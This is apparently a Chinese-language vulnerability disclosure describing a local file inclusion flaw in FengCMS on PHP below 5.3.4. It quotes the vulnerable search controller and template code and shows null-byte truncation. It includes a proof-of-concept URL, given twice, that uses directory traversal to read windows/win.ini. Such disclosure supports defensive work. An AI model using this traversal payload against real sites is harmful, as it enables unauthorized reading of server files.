### 简要描述: LFI ### 详细说明: 条件:PHP<5.3.4 /app/controller/searchController.php: ``` public function index(){ if(!empty($_POST)){ if(URL_TYPE==1){ echo '<meta http-equiv="refresh" content="0;url='.(($_POST['project'])?'?controller=search&project='.$_POST['project'].'&tags='.$_POST['tags']:'/tags/'.$_POST['tags'].'.html').'">'; }else{ echo '<meta http-equiv="refresh" content="0;url=?controller=search'.(($_POST['project'])?'&project='.$_POST['project'].'&tags='.$_POST['tags']:'&tags='.$_POST['tags']).'.html">'; } }else{ if ($_GET['tags'] != '') { $encode = mb_detect_encoding ( $_GET['tags'], array ("ASCII", "UTF-8", "GB2312", "GBK", "BIG5" ) ); if ($encode != "UTF-8") { $_GET['tags'] = iconv ( "gb2312", "UTF-8", $_GET['tags'] ); } } if($_GET['tags']){ if($_GET['project']!=""){ return $this->display($_GET['project'].'_search.html'); }else{ return $this->display('search.html'); } }else{ echo '<script type="text/javascript">alert("请输入关键词!");history.go(-1)</script>'; } } } } ```...
### 简要描述: LFI ### 详细说明: 条件:PHP<5.3.4 /app/controller/searchController.php: ``` public function index(){ if(!empty($_POST)){ if(URL_TYPE==1){ echo '<meta http-equiv="refresh" content="0;url='.(($_POST['project'])?'?controller=search&project='.$_POST['project'].'&tags='.$_POST['tags']:'/tags/'.$_POST['tags'].'.html').'">'; }else{ echo '<meta http-equiv="refresh" content="0;url=?controller=search'.(($_POST['project'])?'&project='.$_POST['project'].'&tags='.$_POST['tags']:'&tags='.$_POST['tags']).'.html">'; } }else{ if ($_GET['tags'] != '') { $encode = mb_detect_encoding ( $_GET['tags'], array ("ASCII", "UTF-8", "GB2312", "GBK", "BIG5" ) ); if ($encode != "UTF-8") { $_GET['tags'] = iconv ( "gb2312", "UTF-8", $_GET['tags'] ); } } if($_GET['tags']){ if($_GET['project']!=""){ return $this->display($_GET['project'].'_search.html'); }else{ return $this->display('search.html'); } }else{ echo '<script type="text/javascript">alert("请输入关键词!");history.go(-1)</script>'; } } } } ``` 上面我们让post为空,$_GET['tags']不为空,$_GET['project']可控,接着看display() /system/core/controller.php:27行 ``` public function display($path,$data=""){ if(!isset($path)){ return throwexce(sprintf('Template file does not exist!')); }else{ $tpl= new template(); if(!empty($data)){ extract($data,EXTR_OVERWRITE); } include template::tpl($path); } } ``` $path直接被include,(由于程序自带stripslashes前面提到过)%00截断,LFI有了 poc: ``` localhost/fengcms/index.php?controller=search&operate=index&tags=1&project=../../../../../../../windows/win.ini%00 ``` [<img src="https://images.seebug.org/upload/201406/28165842775e1b3c4b70ba59995bdcfacd49ec17.png" alt="QQ20140628-3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/28165842775e1b3c4b70ba59995bdcfacd49ec17.png) ### 漏洞证明: ``` localhost/fengcms/index.php?controller=search&operate=index&tags=1&project=../../../../../../../windows/win.ini%00 ``` [<img src="https://images.seebug.org/upload/201406/28165842775e1b3c4b70ba59995bdcfacd49ec17.png" alt="QQ20140628-3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/28165842775e1b3c4b70ba59995bdcfacd49ec17.png)